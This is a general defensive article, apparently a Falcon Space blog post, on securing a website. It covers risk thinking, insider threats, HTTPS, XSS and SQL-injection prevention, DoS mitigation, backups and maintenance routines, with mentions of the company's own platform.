How to protect the site? Ensuring the site’s information security
Introduction
In this article, we will consider such an important component of the site’s work as information security. We will define the main principles, threats, and recommendations for improving the level of site security.
We will also touch on our web platform Falcon Space in the context of information security issues.
Principles. What to consider when ensuring the information security of the site
Safety is defined as the weakest link in protection
If your house has a massive steel door, but the windows are always open, the overall state of security will be low. You can install various antivirus programs, close all ports on the server, but if your users put passwords 123456 and write them on a piece of paper on the desktop on the PC, then the risks of being hacked are very high.
Therefore, the focus should always be on the weakest link at the moment.
The economic rationale for hacking
Why do they hack any system? For some benefit. If hacking is cheaper than this benefit, then the game is worth the candle. The task of protection is to make hacking unprofitable.
It is necessary to maximize the cost of hacking. This is primarily the time for hacking and the hardware / software resources of the attacker.
What to protect on the site? Confidentiality, Integrity, and Availability
What can be wrong with the information on the site?
- There may be a data leak — the confidentiality of the information will be lost.
- The data may be damaged — the information will lose its integrity.
- The information may become unavailable to the user — the availability is lost.
All security measures are in one way or another aimed at ensuring the confidentiality, integrity or availability of information.
The human factor in information security is the most delicate point
Man is weak. It has many temptations and vulnerabilities. Someone can be bribed, someone can be intimidated, and someone can simply give access to an attacker by phone.
The internal person (the insider) is more dangerous for the system, rather than the person from the street. He may have many reasons to help the attacker: offended at work, do not give a promotion, “part-time work”, dirt on him, etc. Having access to the internal part of the systems a person becomes the entry point to the system for the attacker.
Threats to the site and appropriate measures
No need to shoot a cannon at sparrows. Your protection must match the threat level and the attacker’s model. If the NSA is working against you, then it will probably take a lot of resources to protect you (but, for sure, in this case, you have something to protect).
It is important to imagine an approximate portrait of the attacker and his capabilities.
This will allow you to understand what the attacker can do, what goals he is pursuing (what he will be able to get from you in the event of a successful hack) and what attack options he can implement.
Continuity of the security state
The security system must operate continuously over time. It will look strange for collectors who, when transporting money at 13: 00, all at once went to a cafe for lunch, leaving the money in the car.
It is necessary to provide for factors that can “break” this continuity of the security state: the lights are turned off, the system administrator has quit, some software or encryption key needs to be updated.
Risk management approach — risks of information security of the site
Information security is the same as working with risks.
Risk is the probability and criticality for a business.
Evaluate your information security risks in terms of the probability of a negative event and the degree of criticality. Next, consider measures that can reduce the likelihood of risk and measures to reduce criticality.
Information security threats to the site on the CIA and measures to counteract security threats
The first question is what is the heart of the matter? Who is the attacker, and why does he need to hack our site?
What will he get? What hacking capabilities does it have? What budget can it allocate for hacking?
By understanding these issues, you will be able to more adequately develop a number of measures to protect your site.
We will analyze the main site protection measures for threats to the privacy, integrity and availability of information on the site. Some of the measures belong to several types at once.
Privacy measures
SSL Protocol (HTTPS)
An HTTPS connection encrypts the traffic between the browser and the server. This makes it more difficult for an attacker to obtain data in intermediate nodes (for example, extracting the user’s password when logging in).
SSL also gives a certain guarantee to the user that he interacts with the right site (the browser shows the information whose certificate it is).
Protection against various attacks on the web application (XSS, SQL injection).
The user can enter a certain code through the form fields and this code can negatively affect the operation of the system.
For example, an XSS attack involves entering JS code that will be stored in the site’s database (for example, as a support ticket), then another user will request this data from the database and this malicious JS code will be executed on behalf of this user.
In Falcon Space, we provide protection against XSS at the role level. Only some roles defined in the settings can save HTML markup in the system. For all others, the markup is stored in encoded form (which does not allow you to embed JS code).
SQL Injection attack-SQL code is introduced that modifies the SQL executed on the server. This is a very dangerous thing, because it allows you to enter direct commands into the database (for example, delete data or read data from tables). SQL injection protection — all sql code is executed in stored procedures with parameters without using dynamically generated procedures.
In Falcon Space, all processing is based on stored procedures with parameters.
Software update
Periodically, developers find vulnerabilities in the software and release updates. If you do not make updates, then there is a risk that this vulnerability will be exploited by attackers. It is necessary to prevent the server and the software on it.
Organizational measures and employee training
You can build a business process in such a way as to reduce the likelihood of privacy and integrity leaks. An example is the creation and signing of payment documents by different people. Reduces the likelihood of abuse by the cashier and the controller.
The second direction is training. People should be well aware of their site and their role in the processes. What they can and can’t do. Know what situations are and how they should respond to them.
Measures to ensure the integrity of information on the site
Transactions
If a number of operations are to be executed as a single whole, then they must be enclosed in a single transaction, which will either be fully executed or rolled back.
This is important for cases such as adding funds to your balance. Within a single transaction, the payment statuses are changed, the user’s balance is changed, and this operation is logged. In case of problems, the system will always remain in a complete state, because there will not be a situation that we have changed the status, and the replenishment of the balance and logging did not occur.
The Falcon Space platform allows you to change SQL scripts, because you can independently set transactions in the system to suit your needs.
Data integrity control via scripts
The data in the system should be checked periodically. The site code may contain errors that will lead to a violation of the integrity. In this case, you need to create a number of scripts that will check the integrity of the data in the tables using business logic. You can run such scripts daily to find collisions in the data, and then issue a report to the mail.
The Falcon Space platform has a similar report for searching for slow queries. The script for searching for problematic queries is executed daily and a short report is sent to the mail.
Correct data structure in the database
If the database structure has problems, data integrity may be compromised when the data is partially updated. It is necessary to use a sufficient level of database normalization, impose restrictions, set foreign keys, etc.
Search and fix software errors (prevention, support)
It is stupid to think that you have developed a website 1 time, and it will now work smoothly without support, without hosting administration, etc.
If the site was developed, and not just made from ready-made blocks, then there may be errors in it. And they can get out not immediately, but during operation.
It is necessary to carry out the prevention of the application-look at the logs, analyze the performance, look for problem points.
This affects both the quality of the site and the state of security. In the course of such reviews, gaps may be found that did not manifest themselves in any way at the site development stage.
Measures to ensure the availability of the site
DOS protection
A DOS attack is the organization of multiple requests to a site in order to overload it. There is a denial of service — the server simply begins to fail to cope with the resulting load.
Protection against DOS attacks lies primarily on the hoster. Ask questions about protection against DOS attacks to your hoster.
You can also block suspicious IP addresses, because your server will simply not process some requests. The main thing here is not to overdo it, because in this way, you can weed out real users along with bots (programs that visit the site).
Load testing
Run load tests, find problem areas in your website.What works well at low volume can be very slow at high revs.
An example of such a test can be found here — load testing of the Falcon Space catalog via Loader.io.
Backup Server
If there is a complete problem with the main server, it would be good to be able to quickly restore the application to the backup server. Ideally, make several servers work in a bundle, so that when one server fails, requests go to another server.
Availability monitoring and alerts
If there is a site shutdown, you need to find out about it as early as possible in order to immediately take all measures to restore the site. For this purpose, monitoring tools are used that poll the site. In case of a crash, they report the problem via email or sms. Example of a free service for monitoring site availability — https://uptimerobot.com/
Recommendations for ensuring the information security of the site
Passwords
Use complex passwords, but they are easy to remember. In this case, the user will not write them down on a piece of paper. Example: Kata007pulta * Password contains special characters, numbers, upper case, more than 8 characters. Such a password is difficult to find, but easy to remember for the user.
Periodically change important passwords.If you store passwords, then make an archive with the password, and store Excel with passwords locally on your PC.
Minimal access and remove all unnecessary elements
Each user must have a minimum level of access that is sufficient for their work. No need to give more than he needs to fulfill his official duties. Any element of your system can be attacked from the outside, and the fewer opportunities this element has, the better.
Block access through unused ports on the server. Each port is a potential entry point for an attacker.
Updates
Install updates in a timely manner. Set up the work schedule for updating the main software — server software, CMS site, antivirus, etc.
Insiders
An insider is much more dangerous than an outside attacker. He already has access to the system. There is some trust in him from other people in the system. He can spend a long time quietly messing up the system. Create conditions for maximum satisfaction of people in the system, part with everyone amicably, without leaving debts to others (especially to programmers and system administrators).
The more complex the solution, the more holes and errors there are
The complexity of the program goes hand in hand with errors. The more code there is, the more features there are, the more bugs there may be.
And bugs are a risk factor for hacking the system. Reduce the complexity of the system. As it develops, it will become more complicated for natural reasons (a lot of data, mandatory user wishes, etc.) — you should not complicate everything at the first stages with your own hands.
Use the basics of risk management
Review the risks and measures to reduce the criticality and probability of risk occurrence.
Risks are not something that is set in stone. You have done some work to reduce the risks, and it is necessary to review them, to focus on other risks.
Do not share unnecessary information
An external attacker collects information first from open sources. Bit by bit, it searches for system vulnerabilities, studies the structure of the system and possible entry points into it.
Do not share information that is sensitive to hacking. By doing so, you will reduce the chance of being hacked by an external attacker.
Don’t put anything on your phone or PC
On workstations (and even more so on servers), there should be no unnecessary software. Any additional information is a potential risk of getting a virus or other malware.
Vulnerabilities in the software can also be a point of entry into the system.
Therefore, install applications only from trusted sources and give these applications the minimum necessary rights.
For programmers-do not trust user input
When a site processes a request from the browser, you cannot trust the data entered from the user.
In the Falcon Space platform, almost any procedure accepts the @username parameter, which is located inside the system, and is not received from the browser. This is what we focus on when authorizing access to certain resources.
For example, the getOrder request came and the OrderID parameter was passed — could we just issue an order by OrderID? No, because the user could specify someone else’s OrderID. We need to check first (by @username) whether the current user has access to this object.
Backups, backups, backups!
Make backups of the database and site files. Backups should be created daily. They need to be copied to a remote storage (yandex. disk or dropbox). If the server burns down, your backups will be safe.
Periodically check that your backups are being made and they are usable (it may happen that backups are being made, but they are damaged and cannot be used; or they are being made very truncated and do not allow you to fully restore the information).
Support and control regulations
Make backups of the database and site files. Backups should be created daily. They need to be copied to a remote storage (yandex. disk or dropbox). If the server burns down, your backups will be safe.
Periodically check that your backups are being made and they are usable (it may happen that backups are being made, but they are damaged and cannot be used; or they are being made very truncated and do not allow you to fully restore the information).
Support and control regulations
System administrator executes it, checks critical server parameters (memory, disk space, processor), studies system logs, performs software updates, and monitors site and database backups..
Prevention regulations for the application
This procedure can be executed by a developer on support.It is necessary to study the application error log, make error diagnostics and enter the bug tracker, which needs to be corrected.
It also makes sense to run diagnostics on performance, look for weak queries, and optimize them.
Scheduled password updates
You can make password changes for important entry points — database connection, access to hosting panels, server access, access to billing accounts, etc.
Regulations for reviewing the composition of threats and related measures (risk management)
At least once every six months, it makes sense to return to the risks of information security and update measures and regulations for more adequate protection against newly identified threats.
Conclusion
Information security requires time and money. And there is no visible return from it. Something was done, implemented, and there is no direct benefit from it.
But there are risks that can eventually cause enormous damage. By making a small effort (20% Pareto), you can provide a significant degree of site security and make it more difficult for an attacker to break in (i.e. protect yourself from 80% of attacks).
Start with the minimum security basics, iteratively adding new elements as needed.
There is a beautiful Murphy’s law: “If something can and must break, it will break.”
Its meaning is not that you will be hacked, but the meaning is that someone will be hacked at some point.Whether it’s your site or someone else’s, tomorrow or in a year, but it will definitely happen.
Originally published at https://falconspace.site.